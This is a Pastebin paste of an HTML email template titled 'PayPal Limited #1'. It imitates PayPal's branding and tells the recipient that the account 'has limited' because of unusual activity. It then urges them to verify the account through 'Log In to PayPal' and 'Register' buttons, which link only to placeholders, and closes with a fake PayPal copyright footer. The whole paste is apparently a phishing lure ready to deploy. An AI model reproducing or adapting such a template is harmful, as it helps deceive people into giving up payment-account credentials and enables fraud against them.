AlexaMP

PayPal Limited #1

Feb 13th, 2020
698
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 2.22 KB | None | 0 0
  1. <style>
  2. @import url('https://fonts.googleapis.com/css?family=Lato|Roboto&display=swap');
  3. @import url('https://fonts.googleapis.com/css?family=Acme&display=swap');
  4. body{
  5.     margin:0 auto;
  6.     background:#E4E4E4;
  7. }
  8. a{
  9.     text-decoration:none;
  10. }
  11. .panel{
  12.     margin:0 auto;
  13.     max-width:500px;
  14.     padding:10px;
  15.     font-family: 'Roboto', sans-serif;
  16.     font-size:10px;
  17. }
  18.  
  19. .header{
  20.     background: rgb(2,0,36);
  21.     background: linear-gradient(90deg, rgba(0,212,255,1) 0%, rgba(9,9,121,1) 35%, rgba(2,0,36,1) 100%);
  22.     color:white;
  23.     padding:10px 20px;
  24.     font-size:20px;
  25.     margin-top:10px;
  26.     font-family: 'Acme', sans-serif;
  27.     letter-spacing:1;
  28. }
  29. .body{
  30.     background:#fff;
  31.     color:#333;
  32.     padding:10px 20px 20px 15px;
  33.     font-size:13px;
  34.     font-family: 'Roboto', sans-serif;
  35. }
  36. .body h1{
  37.     font-size:23px;
  38.     color:rgba(2,0,36,1);
  39.     font-family: 'Roboto', sans-serif;
  40. }
  41. .button1{
  42.     width:100%;
  43.     padding:10px 30px;
  44.     background: #0070BA;
  45.     border:10px solid #0070BA;
  46.     color:#fff;
  47.     border-radius:5px;
  48.     font-family: 'Roboto', sans-serif;
  49. }
  50. .button2{
  51.     width:100%;
  52.     padding:10px 30px;
  53.     background: #E1E7EB;
  54.     border:10px solid #E1E7EB;
  55.     color:#000;
  56.     border-radius:5px;
  57.     font-family: 'Roboto', sans-serif;
  58. }
  59. </style>
  60. <div class='panel'>
  61.     <div class='header'>
  62.         <b><i>PayPal</i></b>
  63.     </div>
  64.     <div class='body'>
  65.         <div style='display:inline-block;width:60%;'>
  66.         <h1>Your PayPal account has limited.</h1>
  67.         Our automated system detects any unusual activity on your paypal account, so we must limit your account access for security reasons. Please verify your account to recover your account.<br/><br/>
  68.         Sincerely,<br/><br/>
  69.         PayPal Team
  70.         </div>
  71.         <div style='display:inline-block;width39%;'>
  72.         <a href='#'>
  73.             <button class='button1'>Log In to PayPal</button>
  74.         </a><br/><br/>
  75.         <a href='#'>
  76.             <button class='button2'>Register</button>
  77.         </a>
  78.         <br/><br/><br/><br/><br/><br/>
  79.        
  80.         </div>
  81.     </div>
  82.    
  83.     <div style='padding:10px;'>
  84. Please do not reply to this email. Unfortunately, we are unable to respond to inquiries sent to this address. For immediate answers to your questions, simply visit our Help Center by clicking "Help & Contact" at the bottom of any PayPal page.
  85. <br/><br/>
  86. Copyright &copy; 2019 PayPal. All rights reserved.
  87.     </div>
  88. </div>
Add Comment
Please, Sign In to add comment